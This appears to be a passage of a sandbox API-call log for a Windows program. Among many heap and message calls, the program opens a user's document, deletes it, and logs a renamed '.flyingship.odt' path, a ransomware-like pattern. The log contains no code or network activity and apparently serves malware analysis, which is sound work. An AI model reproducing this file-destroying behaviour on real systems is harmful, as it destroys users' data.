(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a30 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1960 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba618 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0172.902] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0172.902] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0172.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0172.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0172.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0172.903] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0172.903] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b50 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0172.904] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0172.904] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.904] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.905] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0172.905] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.905] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x120 [0172.906] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.906] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.906] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.906] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0172.906] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.906] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.906] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.908] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.908] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.908] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0172.908] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.908] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.908] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0172.909] FreeLibrary (hLibModule=0x75990000) returned 1 [0172.909] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.909] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.909] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.909] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFilePart=0x0) returned 0x44 [0172.910] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0xc6b2fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0x90af58 [0172.910] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kwbyebinhhcjlml\\p_2chhlm.odt")) returned 1 [0172.913] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0734080, ftCreationTime.dwHighDateTime=0x1d5e226, ftLastAccessTime.dwLowDateTime=0x8494bac0, ftLastAccessTime.dwHighDateTime=0x1d5e4b9, ftLastWriteTime.dwLowDateTime=0xc6b2fc0, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x118f8, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="P_2cHhLM.odt", cAlternateFileName="")) returned 0 [0172.913] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.913] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.914] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.914] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.914] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.914] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.914] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.914] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.914] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.914] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0172.914] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.916] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.916] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0172.916] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.916] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0172.916] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xa6f010 [0172.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0172.917] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0172.917] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x1181, lpOverlapped=0x0) returned 1 [0172.917] ReadFile (in: hFile=0x120, lpBuffer=0xa5f008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xa5f008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0172.917] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x1181, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0172.917] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0172.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.917] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa6f010 | out: hHeap=0x8a0000) returned 1 [0172.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0172.917] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0172.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\n", cchWideChar=82, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 82 [0172.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x52) returned 0x8c4a48 [0172.918] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\n", cchWideChar=82, lpMultiByteStr=0x8c4a48, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\P_2cHhLM.flyingship.odt\r\n", lpUsedDefaultChar=0x0) returned 82 [0172.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0172.918] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d10 [0172.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c4a48 | out: hHeap=0x8a0000) returned 1 [0172.918] WriteFile (in: hFile=0x120, lpBuffer=0x9a5d10*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d10*, lpNumberOfBytesWritten=0x87f43c*=0x51, lpOverlapped=0x0) returned 1 [0172.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0172.918] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0172.918] CloseHandle (hObject=0x120) returned 1 [0172.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0172.919] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0172.921] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0172.921] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8edfa0 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0172.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0172.922] 